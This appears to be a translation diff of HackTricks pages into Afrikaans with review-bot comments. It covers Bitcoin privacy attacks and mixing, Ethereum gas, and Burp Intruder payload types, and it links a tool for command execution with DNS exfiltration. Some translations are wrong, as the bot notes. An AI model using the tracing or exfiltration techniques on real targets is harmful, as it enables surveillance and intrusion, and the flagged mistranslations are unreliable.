* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## Basic Concepts
|
||||
## Basiese Konsepte
|
||||
|
||||
- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries.
|
||||
- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end.
|
||||
- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts.
|
||||
- **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
|
||||
- **DeFi** stands for Decentralized Finance, offering financial services without central authorities.
|
||||
- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively.
|
||||
- **Slim Kontrakte** word gedefinieer as programme wat op 'n blokketting uitgevoer word wanneer sekere voorwaardes voldoen word, wat ooreenkomste outomaties sonder tussenpersone uitvoer.
|
||||
- **Gedentraliseerde Toepassings (dApps)** bou op slim kontrakte, met 'n gebruikersvriendelike voorkant en 'n deursigtige, auditeerbare agterkant.
|
||||
- **Tokens & Munte** onderskei waar munte as digitale geld dien, terwyl tokens waarde of eienaarskap in spesifieke kontekste verteenwoordig.
|
||||
- **Hulpmiddel-Tokens** gee toegang tot dienste, en **Sekuriteits-Tokens** dui bateseienaarskap aan.
|
||||
- **DeFi** staan vir Gedentraliseerde Finansies en bied finansiële dienste sonder sentrale owerhede.
|
||||
- **DEX** en **DAO's** verwys onderskeidelik na Gedentraliseerde Ruilplatforms en Gedentraliseerde Outonome Organisasies.
|
||||
|
||||
## Consensus Mechanisms
|
||||
## Konsensusmeganismes
|
||||
|
||||
Consensus mechanisms ensure secure and agreed transaction validations on the blockchain:
|
||||
- **Proof of Work (PoW)** relies on computational power for transaction verification.
|
||||
- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW.
|
||||
Konsensusmeganismes verseker veilige en ooreengekome transaksievalidasies op die blokketting:
|
||||
- **Bewys van Werk (PoW)** steun op rekenaarvermoë vir transaksieverifikasie.
|
||||
- **Bewys van Aandeel (PoS)** vereis dat valideerders 'n sekere hoeveelheid tokens besit, wat energieverbruik verminder in vergelyking met PoW.
|
||||
|
||||
## Bitcoin Essentials
|
||||
## Bitcoin Essensies
|
||||
|
||||
### Transactions
|
||||
### Transaksies
|
||||
|
||||
Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers.
|
||||
Bitcoin-transaksies behels die oordra van fondse tussen adresse. Transaksies word deur digitale handtekeninge gevalideer, wat verseker dat slegs die eienaar van die privaat sleutel oordragte kan inisieer.
|
||||
|
||||
#### Key Components:
|
||||
#### Sleutelkomponente:
|
||||
|
||||
- **Multisignature Transactions** require multiple signatures to authorize a transaction.
|
||||
- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules).
|
||||
- **Multisignature-transaksies** vereis meervoudige handtekeninge om 'n transaksie te magtig.
|
||||
- Transaksies bestaan uit **inskrywings** (bron van fondse), **uitsette** (bestemming), **fooie** (betaal aan myners) en **skripsies** (transaksiereëls).
|
||||
|
||||
### Lightning Network
|
||||
### Lightning-netwerk
|
||||
|
||||
Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain.
|
||||
Beoog om die skaalbaarheid van Bitcoin te verbeter deur meervoudige transaksies binne 'n kanaal toe te laat, en slegs die finale toestand na die blokketting uit te saai.
|
||||
|
||||
## Bitcoin Privacy Concerns
|
||||
## Bitcoin-privasiemetodes
|
||||
|
||||
Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users.
|
||||
Privasiemetodes, soos **Gemeenskaplike Invoereienaarskap** en **UTXO-veranderingsadresopsporing**, maak gebruik van transaksiepatrone. Strategieë soos **Mengers** en **CoinJoin** verbeter anonimiteit deur transaksieskakels tussen gebruikers te verdoesel.
|
||||
|
||||
## Acquiring Bitcoins Anonymously
|
||||
## Anonieme verkryging van Bitcoins
|
||||
|
||||
Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy.
|
||||
Metodes sluit kontanttransaksies, mynbou en die gebruik van mengers in. **CoinJoin** meng verskeie transaksies om spoorbaarheid te bemoeilik, terwyl **PayJoin** CoinJoins as gewone transaksies vermom vir verhoogde privaatheid.
|
||||
|
||||
|
||||
# Bitcoin Privacy Atacks
|
||||
# Bitcoin-privasiemetodes
|
||||
|
||||
# Summary of Bitcoin Privacy Attacks
|
||||
# Opsomming van Bitcoin-privasiemetodes
|
||||
|
||||
In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy.
|
||||
In die wêreld van Bitcoin is die privaatheid van transaksies en die anonimiteit van gebruikers dikwels onderwerp van kommer. Hier is 'n vereenvoudigde oorsig van verskeie algemene metodes waarmee aanvallers Bitcoin-privasie kan benadeel.
|
||||
|
||||
## **Common Input Ownership Assumption**
|
||||
## **Gemeenskaplike Invoereienaarskap-aanname**
|
||||
|
||||
It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**.
|
||||
Dit is oor die algemeen selde dat invoere van verskillende gebruikers in 'n enkele transaksie gekombineer word as gevolg van die betrokkenheid van kompleksiteit. Dus word **twee invoeradresse in dieselfde transaksie dikwels aan dieselfde eienaar toegeskryf**.
|
||||
|
||||
## **UTXO Change Address Detection**
|
||||
## **UTXO-veranderingsadresopsporing**
|
||||
|
||||
A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy.
|
||||
'n UTXO, of **Ongebruikte Transaksie-uitset**, moet heeltemal in 'n transaksie spandeer word. As slegs 'n deel daarvan na 'n ander adres gestuur word, gaan die res na 'n nuwe veranderingsadres. Waarnemers kan aanneem dat hierdie nuwe adres aan die sender behoort, wat privaatheid benadeel.
|
||||
|
||||
### Example
|
||||
To mitigate this, mixing services or using multiple addresses can help obscure ownership.
|
||||
### Voorbeeld
|
||||
Om dit te verminder, kan mengdienste of die gebruik van verskeie adresse help om eienaarskap te verdoesel.
|
||||
|
||||
## **Social Networks & Forums Exposure**
|
||||
## **Sosiale Netwerke & Forum Blootstelling**
|
||||
|
||||
Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**.
|
||||
Gebruikers deel soms hul Bitcoin-adresse aanlyn, wat dit **maklik maak om die adres aan sy eienaar te koppel**.
|
||||
|
||||
## **Transaction Graph Analysis**
|
||||
## **Transaksiegrafiekontleding**
|
||||
|
||||
Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds.
|
||||
Transaksies kan as grafieke voorgestel word, wat potensiële verbindings tussen gebruikers onthul op grond van die vloei van fondse.
|
||||
|
||||
## **Unnecessary Input Heuristic (Optimal Change Heuristic)**
|
||||
## **Onnodige Invoerheuristiek (Optimale Veranderingsheuristiek)**
|
||||
|
||||
This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender.
|
||||
|
||||
### Example
|
||||
Hierdie heuristiek is gebaseer op die analise van transaksies met meervoudige invoere en uitsette om te raai watter uitset die verandering is wat na die sender terugkeer.
|
||||
|
||||
### Voorbeeld
|
||||
```bash
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
Indien die toevoeging van meer insette die uitset groter maak as enige enkele inset, kan dit die heuristiek in die war bring.
|
||||
|
||||
If adding more inputs makes the change output larger than any single input, it can confuse the heuristic.
|
||||
## **Gedwonge Adres Hergebruik**
|
||||
|
||||
## **Forced Address Reuse**
|
||||
Aanvallers kan klein bedrae na voorheen gebruikte adresse stuur, in die hoop dat die ontvanger dit saam met ander insette in toekomstige transaksies gebruik, en sodoende adresse aan mekaar koppel.
|
||||
|
||||
Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together.
|
||||
### Korrekte Beursiegedrag
|
||||
Beursies moet voorkom dat munte ontvang op reeds gebruikte, leë adresse om hierdie privaatheidslek te voorkom.
|
||||
|
||||
### Correct Wallet Behavior
|
||||
Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak.
|
||||
## **Ander Blockchain Analise Tegnieke**
|
||||
|
||||
## **Other Blockchain Analysis Techniques**
|
||||
- **Presiese Betalingsbedrae:** Transaksies sonder wisselgeld is waarskynlik tussen twee adresse wat deur dieselfde gebruiker besit word.
|
||||
- **Ronde Getalle:** 'n Ronde getal in 'n transaksie dui daarop dat dit 'n betaling is, met die nie-ronde uitset wat waarskynlik die wisselgeld is.
|
||||
- **Beursie Vingerafdrukke:** Verskillende beursies het unieke transaksie-skeppingspatrone, wat analiste in staat stel om die gebruikte sagteware en moontlik die wisselgeldadres te identifiseer.
|
||||
- **Bedrag & Tydsverbande:** Die bekendmaking van transaksie-tye of -bedrae kan transaksies naspeurbaar maak.
|
||||
|
||||
- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user.
|
||||
- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change.
|
||||
- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address.
|
||||
- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable.
|
||||
## **Verkeersanalise**
|
||||
|
||||
## **Traffic Analysis**
|
||||
Deur netwerkverkeer te monitor, kan aanvallers moontlik transaksies of blokke aan IP-adresse koppel, wat die privaatheid van gebruikers in gevaar kan bring. Dit is veral waar as 'n entiteit baie Bitcoin-nodes bedryf, wat hul vermoë om transaksies te monitor verbeter.
|
||||
|
||||
By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions.
|
||||
|
||||
## More
|
||||
For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
|
||||
## Meer
|
||||
Vir 'n omvattende lys van privaatheidsaanvalle en verdedigings, besoek [Bitcoin Privacy op Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
|
||||
|
||||
|
||||
# Anonymous Bitcoin Transactions
|
||||
# Anonieme Bitcoin Transaksies
|
||||
|
||||
## Ways to Get Bitcoins Anonymously
|
||||
## Maniere om Bitcoins Anoniem te Kry
|
||||
|
||||
- **Cash Transactions**: Acquiring bitcoin through cash.
|
||||
- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin.
|
||||
- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining)
|
||||
- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended.
|
||||
- **Kontant Transaksies**: Bitcoin verkry deur kontant.
|
||||
- **Alternatiewe Kontant**: Aankoop van geskenkkaarte en dit aanlyn ruil vir bitcoin.
|
||||
- **Mynbou**: Die mees private metode om bitcoins te verdien is deur mynbou, veral wanneer dit alleen gedoen word, omdat mynbou-poele die IP-adres van die mynwerker kan weet. [Mynbou-poele-inligting](https://en.bitcoin.it/wiki/Pooled_mining)
|
||||
- **Diefstal**: Teoreties kan die steel van bitcoin 'n ander metode wees om dit anoniem te bekom, alhoewel dit onwettig en nie aanbeveel word nie.
|
||||
|
||||
## Mixing Services
|
||||
## Mengdienste
|
||||
|
||||
By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos.
|
||||
Deur 'n mengdiens te gebruik, kan 'n gebruiker **bitcoins stuur** en **verskillende bitcoins in ruil ontvang**, wat dit moeilik maak om die oorspronklike eienaar op te spoor. Dit vereis egter vertroue in die diens om nie logboeke te hou en om die bitcoins werklik terug te gee. Alternatiewe mengopsies sluit Bitcoin-casinos in.
|
||||
|
||||
## CoinJoin
|
||||
|
||||
**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced.
|
||||
**CoinJoin** voeg verskeie transaksies van verskillende gebruikers saam in een, wat die proses vir enigeen wat probeer om insette met uitsette te koppel, bemoeilik. Ten spyte van sy doeltreffendheid kan transaksies met unieke inset- en uitsetgroottes steeds potensieel nagespoor word.
|
||||
|
||||
Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
|
||||
Voorbeeldtransaksies wat moontlik CoinJoin gebruik het, sluit in `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` en `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
|
||||
|
||||
For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners.
|
||||
Vir meer inligting, besoek [CoinJoin](https://coinjoin.io/en). Vir 'n soortgelyke diens op Ethereum, kyk na [Tornado Cash](https://tornado.cash), wat transaksies anonimiseer met fondse van mynwerkers.
|
||||
|
||||
## PayJoin
|
||||
|
||||
A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
|
||||
|
||||
'n Variasie van CoinJoin, **PayJoin** (of P2EP), vermom die transaksie tussen twee partye (bv. 'n kliënt en 'n handelaar) as 'n gewone transaksie, sonder die kenmerkende gelyke uitsette van CoinJoin. Dit maak dit uiters moeilik om op te spoor en kan die algemene-inset-eienaarskap-heuristiek wat deur transaksie-surveillance-entiteite gebruik word, ongeldig maak.
|
||||
```plaintext
|
||||
2 btc --> 3 btc
|
||||
5 btc 4 btc
|
||||
```
|
||||
Transaksies soos die bogenoemde kan PayJoin wees, wat privaatheid verbeter terwyl dit nie onderskeibaar is van standaard bitcoin-transaksies nie.
|
||||
|
||||
Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions.
|
||||
|
||||
**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy.
|
||||
**Die gebruik van PayJoin kan tradisionele bewakingsmetodes aansienlik ontwrig**, wat dit 'n belowende ontwikkeling maak in die strewe na transaksionele privaatheid.
|
||||
|
||||
|
||||
# Best Practices for Privacy in Cryptocurrencies
|
||||
# Beste Praktyke vir Privatiteit in Kriptogeldeenhede
|
||||
|
||||
## **Wallet Synchronization Techniques**
|
||||
## **Balgelykmaak van Beursies Tegnieke**
|
||||
|
||||
To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out:
|
||||
Om privaatheid en veiligheid te handhaaf, is dit noodsaaklik om beursies met die blokketting te sinchroniseer. Twee metodes steek uit:
|
||||
|
||||
- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in.
|
||||
- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found.
|
||||
- **Volle knoop**: Deur die hele blokketting af te laai, verseker 'n volle knoop maksimum privaatheid. Alle transaksies wat ooit gemaak is, word plaaslik gestoor, wat dit onmoontlik maak vir teenstanders om te identifiseer watter transaksies of adresse die gebruiker belangstel.
|
||||
- **Kliëntkant blokfiltering**: Hierdie metode behels die skep van filters vir elke blok in die blokketting, wat beursies in staat stel om relevante transaksies te identifiseer sonder om spesifieke belange aan netwerkwaarnemers bloot te stel. Ligte beursies laai hierdie filters af en haal slegs volle blokke binne wanneer 'n ooreenstemming met die gebruiker se adresse gevind word.
|
||||
|
||||
## **Utilizing Tor for Anonymity**
|
||||
## **Die Gebruik van Tor vir Anonimiteit**
|
||||
|
||||
Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network.
|
||||
Aangesien Bitcoin op 'n eweknie-netwerk werk, word dit aanbeveel om Tor te gebruik om jou IP-adres te verberg en sodoende privaatheid te verbeter wanneer jy met die netwerk skakel.
|
||||
|
||||
## **Preventing Address Reuse**
|
||||
## **Voorkoming van Adres Hergebruik**
|
||||
|
||||
To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design.
|
||||
Om privaatheid te beskerm, is dit noodsaaklik om 'n nuwe adres vir elke transaksie te gebruik. Adres hergebruik kan privaatheid in gevaar bring deur transaksies aan dieselfde entiteit te koppel. Moderne beursies ontmoedig adres hergebruik deur hul ontwerp.
|
||||
|
||||
## **Strategies for Transaction Privacy**
|
||||
## **Strategieë vir Transaksie-Privaatheid**
|
||||
|
||||
- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks.
|
||||
- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods.
|
||||
- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy.
|
||||
- **Meervoudige transaksies**: Die opsplitting van 'n betaling in verskeie transaksies kan die transaksiebedrag verdoesel, wat privaatheidsaanvalle voorkom.
|
||||
- **Vermyding van wisselgeld**: Die keuse vir transaksies wat nie wisselgeld-uitsette vereis nie, verbeter privaatheid deur wisselgeld-opsporingsmetodes te ontwrig.
|
||||
- **Meervoudige wisselgeld-uitsette**: As die vermyding van wisselgeld nie haalbaar is nie, kan die skep van meervoudige wisselgeld-uitsette steeds privaatheid verbeter.
|
||||
|
||||
# **Monero: A Beacon of Anonymity**
|
||||
# **Monero: 'n Baken van Anonimiteit**
|
||||
|
||||
Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy.
|
||||
Monero spreek die behoefte aan absolute anonimiteit in digitale transaksies aan en stel 'n hoë standaard vir privaatheid.
|
||||
|
||||
# **Ethereum: Gas and Transactions**
|
||||
# **Ethereum: Gas en Transaksies**
|
||||
|
||||
## **Understanding Gas**
|
||||
## **Begrip van Gas**
|
||||
|
||||
Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded.
|
||||
Gas meet die berekeningspoging wat nodig is om operasies op Ethereum uit te voer, geprijs in **gwei**. Byvoorbeeld, 'n transaksie wat 2,310,000 gwei (of 0.00231 ETH) kos, behels 'n gaslimiet en 'n basisfooi, met 'n fooi om mynwerkers te motiveer. Gebruikers kan 'n maksimumfooi instel om te verseker dat hulle nie te veel betaal nie, met die oortollige bedrag wat terugbetaal word.
|
||||
|
||||
## **Executing Transactions**
|
||||
## **Uitvoering van Transaksies**
|
||||
|
||||
Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data.
|
||||
Transaksies in Ethereum behels 'n afsender en 'n ontvanger, wat beide gebruikers- of slimkontrakadresse kan wees. Hulle vereis 'n fooi en moet gemyn word. Essensiële inligting in 'n transaksie sluit die ontvanger, die afsender se handtekening, waarde, opsionele data, gaslimiet en fooie in. Merkwaardig word die afsender se adres afgelei uit die handtekening, wat die behoefte daaraan in die transaksiedata elimineer.
|
||||
|
||||
These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security.
|
||||
Hierdie praktyke en meganismes is fundamenteel vir enigiemand wat betrokke wil raak by kriptogeldeenhede terwyl privaatheid en veiligheid vooropgestel word.
|
||||
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
|
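Review bot: the headings "Bitcoin Privacy Concerns", "Bitcoin Privacy Atacks" and "Summary of Bitcoin Privacy Attacks" are all rendered as "Bitcoin-privasiemetodes" ("privacy methods"), and the sentence "Privacy attacks ... exploit transaction patterns" becomes "Privasiemetodes ... maak gebruik van transaksiepatrone", which inverts the meaning: attacks on privacy become privacy techniques. The same file already uses the correct term in the "Meer" paragraph ("privaatheidsaanvalle"), so suggest "Bitcoin-privaatheidsaanvalle", "Opsomming van Bitcoin-privaatheidsaanvalle" and "Privaatheidsaanvalle, soos ..., buit transaksiepatrone uit". Smaller terminology issues in the same hunk: "skripsies" for "scripts" means theses (use "skripte"); "inskrywings" for "inputs" should be "insette", which the file itself uses later under "Onnodige Invoerheuristiek"; "Balgelykmaak van Beursies Tegnieke" for "Wallet Synchronization Techniques" is garbled (use "Beursie-sinchronisasietegnieke"); "geprijs" is Dutch (use "geprys"); "Volle knoop" for "Full node" should be "Volle node", matching "Bitcoin-nodes" in the "Verkeersanalise" section.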
@ -201,16 +195,14 @@ These practices and mechanisms are foundational for anyone looking to engage wit
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
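Review bot: this footer block renders "github repos" as "github-opslag" and "NFTs" as "NFT's", while the header block of the same file (top of the `@ -1,195 +1,189 @@` hunk) uses "github-repos" and "NFTs"; the header and footer of one page carry the same boilerplate and should be word-for-word identical, so align this block with the header.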
@ -1,29 +1,27 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Basic Payloads
|
||||
# Basiese Payloads
|
||||
|
||||
* **Simple List:** Just a list containing an entry in each line
|
||||
* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
|
||||
* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
|
||||
* **Numbers:** Generate numbers from X to Y using Z step or randomly.
|
||||
* **Brute Forcer:** Character set, min & max length.
|
||||
* **Eenvoudige lys:** Net 'n lys met 'n inskrywing in elke lyn
|
||||
* **Runtime-lêer:** 'n Lys wat tydens uitvoering gelees word (nie in geheue gelaai nie). Vir ondersteuning van groot lyste.
|
||||
* **Gevalverandering:** Pas sekere veranderinge toe op 'n lys van strings (Geen verandering, na kleinletters, na GROOTLETTERS, na 'n korrekte naam - Eerste letter in hoofletters en die res na kleinletters -, na 'n korrekte naam - Eerste letter in hoofletters en die res bly dieselfde -.
|
||||
* **Getalle:** Genereer getalle vanaf X tot Y met 'n stap van Z of lukraak.
|
||||
* **Brute Forcer:** Karakterset, minimum & maksimum lengte.
|
||||
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload om opdragte uit te voer en die uitset deur DNS-versoeke na burpcollab te gryp.
|
||||
|
||||
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
|
||||
|
||||
|
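Review bot: `Gevalverandering` for `Case Modification` (the Burp Intruder payload type) reads as "instance change"; the option is about letter case, so `Letterkasverandering` or `Hoofletter-/kleinletterverandering` carries the meaning, and because the Burp UI is English the original label `Case Modification` is worth keeping alongside it in parentheses, as `Brute Forcer` already is. The same line carries over the unbalanced parenthesis from the source: the `(` opened after `strings` is never closed, so the trailing `-.` should become `-).`. The rest of the list (`Runtime-lêer`, `Getalle`, the Collabfiltrator line) reads fine.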
